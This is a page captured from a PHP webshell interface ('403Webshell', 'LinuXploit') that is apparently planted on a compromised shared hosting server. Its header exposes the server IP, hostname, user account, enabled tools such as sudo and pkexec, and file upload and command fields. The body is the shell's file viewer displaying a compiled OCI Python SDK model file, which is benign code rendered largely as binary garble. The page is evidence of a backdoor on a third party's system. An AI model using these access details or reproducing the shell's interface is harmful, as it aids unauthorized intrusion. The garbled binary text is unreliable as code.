403Webshell
Server IP : 162.241.203.86  /  Your IP : 216.73.217.87
Web Server : Apache
System : Linux br1002.hostgator.com.br 5.14.0-687.36.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 7 05:40:49 EDT 2026 x86_64
User : luxlic01 ( 6532)
PHP Version : 8.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3.9/site-packages/oci/data_integration/models/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/python3.9/site-packages/oci/data_integration/models/__pycache__/template.cpython-39.pyc
a

���f~f�@s8ddlmZmZmZddlmZeGdd�de��ZdS)�)�formatted_flat_dict�
NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc@s�eZdZdZdZdZdZdZdZdZ	dd	�Z
ed
d��Zej
dd��Zed
d��Zej
dd��Zedd��Zej
dd��Zedd��Zej
dd��Zedd��Zej
dd��Zedd��Zej
dd��Zedd��Zej
dd��Zedd ��Zej
d!d ��Zed"d#��Zej
d$d#��Zed%d&��Zej
d'd&��Zed(d)��Zej
d*d)��Zed+d,��Zej
d-d,��Zed.d/��Zej
d0d/��Zed1d2��Zej
d3d2��Zed4d5��Zej
d6d5��Zed7d8��Zej
d9d8��Zed:d;��Zej
d<d;��Zed=d>��Zej
d?d>��Zed@dA��Zej
dBdA��ZedCdD��Z e j
dEdD��Z edFdG��Z!e!j
dHdG��Z!edIdJ��Z"e"j
dKdJ��Z"edLdM��Z#e#j
dNdM��Z#edOdP��Z$e$j
dQdP��Z$dRdS�Z%dTdU�Z&dVdW�Z'dXS)Y�Templatez
    Template application.
    �CREATING�ACTIVE�UPDATING�DELETING�DELETED�FAILEDcKsddddddddddddddddddddd	dd
dd�|_dd
ddddddddddddddddddd d!d"d#d�|_d$|_d$|_d$|_d$|_d$|_d$|_d$|_d$|_	d$|_
d$|_d$|_d$|_
d$|_d$|_d$|_d$|_d$|_d$|_d$|_d$|_d$|_d$|_d$|_d$|_d$S)%a
        Initializes a new Template object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param key:
            The value to assign to the key property of this Template.
        :type key: str

        :param model_type:
            The value to assign to the model_type property of this Template.
        :type model_type: str

        :param model_version:
            The value to assign to the model_version property of this Template.
        :type model_version: str

        :param name:
            The value to assign to the name property of this Template.
        :type name: str

        :param description:
            The value to assign to the description property of this Template.
        :type description: str

        :param application_version:
            The value to assign to the application_version property of this Template.
        :type application_version: int

        :param object_status:
            The value to assign to the object_status property of this Template.
        :type object_status: int

        :param identifier:
            The value to assign to the identifier property of this Template.
        :type identifier: str

        :param parent_ref:
            The value to assign to the parent_ref property of this Template.
        :type parent_ref: oci.data_integration.models.ParentReference

        :param object_version:
            The value to assign to the object_version property of this Template.
        :type object_version: int

        :param dependent_object_metadata:
            The value to assign to the dependent_object_metadata property of this Template.
        :type dependent_object_metadata: list[oci.data_integration.models.PatchObjectMetadata]

        :param published_object_metadata:
            The value to assign to the published_object_metadata property of this Template.
        :type published_object_metadata: dict(str, PatchObjectMetadata)

        :param source_application_info:
            The value to assign to the source_application_info property of this Template.
        :type source_application_info: oci.data_integration.models.SourceApplicationInfo

        :param time_patched:
            The value to assign to the time_patched property of this Template.
        :type time_patched: datetime

        :param id:
            The value to assign to the id property of this Template.
        :type id: str

        :param compartment_id:
            The value to assign to the compartment_id property of this Template.
        :type compartment_id: str

        :param display_name:
            The value to assign to the display_name property of this Template.
        :type display_name: str

        :param time_created:
            The value to assign to the time_created property of this Template.
        :type time_created: datetime

        :param time_updated:
            The value to assign to the time_updated property of this Template.
        :type time_updated: datetime

        :param freeform_tags:
            The value to assign to the freeform_tags property of this Template.
        :type freeform_tags: dict(str, str)

        :param defined_tags:
            The value to assign to the defined_tags property of this Template.
        :type defined_tags: dict(str, dict(str, object))

        :param lifecycle_state:
            The value to assign to the lifecycle_state property of this Template.
            Allowed values for this property are: "CREATING", "ACTIVE", "UPDATING", "DELETING", "DELETED", "FAILED", 'UNKNOWN_ENUM_VALUE'.
            Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
        :type lifecycle_state: str

        :param metadata:
            The value to assign to the metadata property of this Template.
        :type metadata: oci.data_integration.models.ObjectMetadata

        :param key_map:
            The value to assign to the key_map property of this Template.
        :type key_map: dict(str, str)

        �str�intZParentReferencezlist[PatchObjectMetadata]zdict(str, PatchObjectMetadata)ZSourceApplicationInfoZdatetimezdict(str, str)zdict(str, dict(str, object))ZObjectMetadata)�key�
model_type�
model_version�name�description�application_version�
object_status�
identifier�
parent_ref�object_version�dependent_object_metadata�published_object_metadata�source_application_info�time_patched�id�compartment_id�display_name�time_created�time_updated�
freeform_tags�defined_tags�lifecycle_state�metadata�key_maprZ	modelTypeZmodelVersionrrZapplicationVersionZobjectStatusrZ	parentRefZ
objectVersionZdependentObjectMetadataZpublishedObjectMetadataZsourceApplicationInfoZtimePatchedrZ
compartmentIdZdisplayNameZtimeCreatedZtimeUpdatedZfreeformTagsZdefinedTagsZlifecycleStater%ZkeyMapN)Z
swagger_typesZ
attribute_map�_key�_model_type�_model_version�_name�_description�_application_version�_object_status�_identifier�_parent_ref�_object_version�_dependent_object_metadata�_published_object_metadata�_source_application_info�
_time_patched�_id�_compartment_id�
_display_name�
_time_created�
_time_updated�_freeform_tags�
_defined_tags�_lifecycle_state�	_metadata�_key_map)�self�kwargs�rA�H/usr/lib/python3.9/site-packages/oci/data_integration/models/template.py�__init__*s�i��zTemplate.__init__cCs|jS)z�
        Gets the key of this Template.
        Generated key that can be used in API calls to identify application.


        :return: The key of this Template.
        :rtype: str
        �r'�r?rArArBr�s
zTemplate.keycCs
||_dS)z�
        Sets the key of this Template.
        Generated key that can be used in API calls to identify application.


        :param key: The key of this Template.
        :type: str
        NrD)r?rrArArBr�s
cCs|jS)z�
        Gets the model_type of this Template.
        The object type.


        :return: The model_type of this Template.
        :rtype: str
        �r(rErArArBr�s
zTemplate.model_typecCs
||_dS)z�
        Sets the model_type of this Template.
        The object type.


        :param model_type: The model_type of this Template.
        :type: str
        NrF)r?rrArArBrs
cCs|jS)z�
        Gets the model_version of this Template.
        The object's model version.


        :return: The model_version of this Template.
        :rtype: str
        �r)rErArArBrs
zTemplate.model_versioncCs
||_dS)z�
        Sets the model_version of this Template.
        The object's model version.


        :param model_version: The model_version of this Template.
        :type: str
        NrG)r?rrArArBrs
cCs|jS)a/
        Gets the name of this Template.
        Free form text without any restriction on permitted characters. Name can have letters, numbers, and special characters. The value is editable and is restricted to 1000 characters.


        :return: The name of this Template.
        :rtype: str
        �r*rErArArBr)s
z
Template.namecCs
||_dS)a2
        Sets the name of this Template.
        Free form text without any restriction on permitted characters. Name can have letters, numbers, and special characters. The value is editable and is restricted to 1000 characters.


        :param name: The name of this Template.
        :type: str
        NrH)r?rrArArBr5s
cCs|jS)z�
        Gets the description of this Template.
        Detailed description for the object.


        :return: The description of this Template.
        :rtype: str
        �r+rErArArBrAs
zTemplate.descriptioncCs
||_dS)z�
        Sets the description of this Template.
        Detailed description for the object.


        :param description: The description of this Template.
        :type: str
        NrI)r?rrArArBrMs
cCs|jS)z�
        Gets the application_version of this Template.
        The application's version.


        :return: The application_version of this Template.
        :rtype: int
        �r,rErArArBrYs
zTemplate.application_versioncCs
||_dS)z�
        Sets the application_version of this Template.
        The application's version.


        :param application_version: The application_version of this Template.
        :type: int
        NrJ)r?rrArArBres
cCs|jS)z�
        Gets the object_status of this Template.
        The status of an object that can be set to value 1 for shallow references across objects, other values reserved.


        :return: The object_status of this Template.
        :rtype: int
        �r-rErArArBrqs
zTemplate.object_statuscCs
||_dS)a

        Sets the object_status of this Template.
        The status of an object that can be set to value 1 for shallow references across objects, other values reserved.


        :param object_status: The object_status of this Template.
        :type: int
        NrK)r?rrArArBr}s
cCs|jS)a
        Gets the identifier of this Template.
        Value can only contain upper case letters, underscore, and numbers. It should begin with upper case letter or underscore. The value can be modified.


        :return: The identifier of this Template.
        :rtype: str
        �r.rErArArBr�s
zTemplate.identifiercCs
||_dS)a%
        Sets the identifier of this Template.
        Value can only contain upper case letters, underscore, and numbers. It should begin with upper case letter or underscore. The value can be modified.


        :param identifier: The identifier of this Template.
        :type: str
        NrL)r?rrArArBr�s
cCs|jS)z�
        Gets the parent_ref of this Template.

        :return: The parent_ref of this Template.
        :rtype: oci.data_integration.models.ParentReference
        �r/rErArArBr�szTemplate.parent_refcCs
||_dS)z�
        Sets the parent_ref of this Template.

        :param parent_ref: The parent_ref of this Template.
        :type: oci.data_integration.models.ParentReference
        NrM)r?rrArArBr�scCs|jS)z�
        Gets the object_version of this Template.
        The version of the object that is used to track changes in the object instance.


        :return: The object_version of this Template.
        :rtype: int
        �r0rErArArBr�s
zTemplate.object_versioncCs
||_dS)z�
        Sets the object_version of this Template.
        The version of the object that is used to track changes in the object instance.


        :param object_version: The object_version of this Template.
        :type: int
        NrN)r?rrArArBr�s
cCs|jS)a
        Gets the dependent_object_metadata of this Template.
        A list of dependent objects in this patch.


        :return: The dependent_object_metadata of this Template.
        :rtype: list[oci.data_integration.models.PatchObjectMetadata]
        �r1rErArArBr�s
z"Template.dependent_object_metadatacCs
||_dS)a
        Sets the dependent_object_metadata of this Template.
        A list of dependent objects in this patch.


        :param dependent_object_metadata: The dependent_object_metadata of this Template.
        :type: list[oci.data_integration.models.PatchObjectMetadata]
        NrO)r?rrArArBr�s
cCs|jS)a
        Gets the published_object_metadata of this Template.
        A list of objects that are published or unpublished in this patch.


        :return: The published_object_metadata of this Template.
        :rtype: dict(str, PatchObjectMetadata)
        �r2rErArArBr�s
z"Template.published_object_metadatacCs
||_dS)a
        Sets the published_object_metadata of this Template.
        A list of objects that are published or unpublished in this patch.


        :param published_object_metadata: The published_object_metadata of this Template.
        :type: dict(str, PatchObjectMetadata)
        NrP)r?rrArArBr�s
cCs|jS)z�
        Gets the source_application_info of this Template.

        :return: The source_application_info of this Template.
        :rtype: oci.data_integration.models.SourceApplicationInfo
        �r3rErArArBr�sz Template.source_application_infocCs
||_dS)z�
        Sets the source_application_info of this Template.

        :param source_application_info: The source_application_info of this Template.
        :type: oci.data_integration.models.SourceApplicationInfo
        NrQ)r?rrArArBrscCs|jS)z�
        Gets the time_patched of this Template.
        The date and time the application was patched, in the timestamp format defined by RFC3339.


        :return: The time_patched of this Template.
        :rtype: datetime
        �r4rErArArBrs
zTemplate.time_patchedcCs
||_dS)z�
        Sets the time_patched of this Template.
        The date and time the application was patched, in the timestamp format defined by RFC3339.


        :param time_patched: The time_patched of this Template.
        :type: datetime
        NrR)r?rrArArBrs
cCs|jS)z�
        Gets the id of this Template.
        OCID of the resource that is used to uniquely identify the application


        :return: The id of this Template.
        :rtype: str
        �r5rErArArBr)s
zTemplate.idcCs
||_dS)z�
        Sets the id of this Template.
        OCID of the resource that is used to uniquely identify the application


        :param id: The id of this Template.
        :type: str
        NrS)r?rrArArBr5s
cCs|jS)z�
        Gets the compartment_id of this Template.
        OCID of the compartment that this resource belongs to. Defaults to compartment of the Workspace.


        :return: The compartment_id of this Template.
        :rtype: str
        �r6rErArArBrAs
zTemplate.compartment_idcCs
||_dS)z�
        Sets the compartment_id of this Template.
        OCID of the compartment that this resource belongs to. Defaults to compartment of the Workspace.


        :param compartment_id: The compartment_id of this Template.
        :type: str
        NrT)r?rrArArBrMs
cCs|jS)a?
        Gets the display_name of this Template.
        Free form text without any restriction on permitted characters. Name can have letters, numbers, and special characters. The value is editable and is restricted to 1000 characters.


        :return: The display_name of this Template.
        :rtype: str
        �r7rErArArBrYs
zTemplate.display_namecCs
||_dS)aJ
        Sets the display_name of this Template.
        Free form text without any restriction on permitted characters. Name can have letters, numbers, and special characters. The value is editable and is restricted to 1000 characters.


        :param display_name: The display_name of this Template.
        :type: str
        NrU)r?rrArArBres
cCs|jS)z�
        Gets the time_created of this Template.
        The date and time the application was created, in the timestamp format defined by RFC3339.


        :return: The time_created of this Template.
        :rtype: datetime
        �r8rErArArBr qs
zTemplate.time_createdcCs
||_dS)z�
        Sets the time_created of this Template.
        The date and time the application was created, in the timestamp format defined by RFC3339.


        :param time_created: The time_created of this Template.
        :type: datetime
        NrV)r?r rArArBr }s
cCs|jS)a
        Gets the time_updated of this Template.
        The date and time the application was updated, in the timestamp format defined by RFC3339.
        example: 2019-08-25T21:10:29.41Z


        :return: The time_updated of this Template.
        :rtype: datetime
        �r9rErArArBr!�szTemplate.time_updatedcCs
||_dS)a
        Sets the time_updated of this Template.
        The date and time the application was updated, in the timestamp format defined by RFC3339.
        example: 2019-08-25T21:10:29.41Z


        :param time_updated: The time_updated of this Template.
        :type: datetime
        NrW)r?r!rArArBr!�scCs|jS)a7
        Gets the freeform_tags of this Template.
        Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
        Example: `{"bar-key": "value"}`


        :return: The freeform_tags of this Template.
        :rtype: dict(str, str)
        �r:rErArArBr"�szTemplate.freeform_tagscCs
||_dS)aC
        Sets the freeform_tags of this Template.
        Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
        Example: `{"bar-key": "value"}`


        :param freeform_tags: The freeform_tags of this Template.
        :type: dict(str, str)
        NrX)r?r"rArArBr"�scCs|jS)a-
        Gets the defined_tags of this Template.
        Usage of predefined tag keys. These predefined keys are scoped to namespaces.
        Example: `{"foo-namespace": {"bar-key": "value"}}`


        :return: The defined_tags of this Template.
        :rtype: dict(str, dict(str, object))
        �r;rErArArBr#�szTemplate.defined_tagscCs
||_dS)a8
        Sets the defined_tags of this Template.
        Usage of predefined tag keys. These predefined keys are scoped to namespaces.
        Example: `{"foo-namespace": {"bar-key": "value"}}`


        :param defined_tags: The defined_tags of this Template.
        :type: dict(str, dict(str, object))
        NrY)r?r#rArArBr#�scCs|jS)a�
        Gets the lifecycle_state of this Template.
        The current state of the workspace.

        Allowed values for this property are: "CREATING", "ACTIVE", "UPDATING", "DELETING", "DELETED", "FAILED", 'UNKNOWN_ENUM_VALUE'.
        Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.


        :return: The lifecycle_state of this Template.
        :rtype: str
        )r<rErArArBr$�s
zTemplate.lifecycle_statecCs gd�}t||�sd}||_dS)z�
        Sets the lifecycle_state of this Template.
        The current state of the workspace.


        :param lifecycle_state: The lifecycle_state of this Template.
        :type: str
        )rrr	r
rrZUNKNOWN_ENUM_VALUEN)rr<)r?r$Zallowed_valuesrArArBr$�s

cCs|jS)z�
        Gets the metadata of this Template.

        :return: The metadata of this Template.
        :rtype: oci.data_integration.models.ObjectMetadata
        �r=rErArArBr%�szTemplate.metadatacCs
||_dS)z�
        Sets the metadata of this Template.

        :param metadata: The metadata of this Template.
        :type: oci.data_integration.models.ObjectMetadata
        NrZ)r?r%rArArBr%�scCs|jS)a
        Gets the key_map of this Template.
        A key map. If provided, key is replaced with generated key. This structure provides mapping between user provided key and generated key.


        :return: The key_map of this Template.
        :rtype: dict(str, str)
        �r>rErArArBr&	s
zTemplate.key_mapcCs
||_dS)a
        Sets the key_map of this Template.
        A key map. If provided, key is replaced with generated key. This structure provides mapping between user provided key and generated key.


        :param key_map: The key_map of this Template.
        :type: dict(str, str)
        Nr[)r?r&rArArBr&s
cCst|�S�N)rrErArArB�__repr__!szTemplate.__repr__cCs|durdS|j|jkS)NF)�__dict__�r?�otherrArArB�__eq__$szTemplate.__eq__cCs
||kSr\rAr_rArArB�__ne__*szTemplate.__ne__N)(�__name__�
__module__�__qualname__�__doc__ZLIFECYCLE_STATE_CREATINGZLIFECYCLE_STATE_ACTIVEZLIFECYCLE_STATE_UPDATINGZLIFECYCLE_STATE_DELETINGZLIFECYCLE_STATE_DELETEDZLIFECYCLE_STATE_FAILEDrC�propertyr�setterrrrrrrrrrrrrrrrrr r!r"r#r$r%r&r]rarbrArArArBrs�8
















	
	






	
	


















	
	

rN)Zoci.utilrrrZoci.decoratorsr�objectrrArArArB�<module>s

Youez - 2016 - github.com/yon3zu
LinuXploit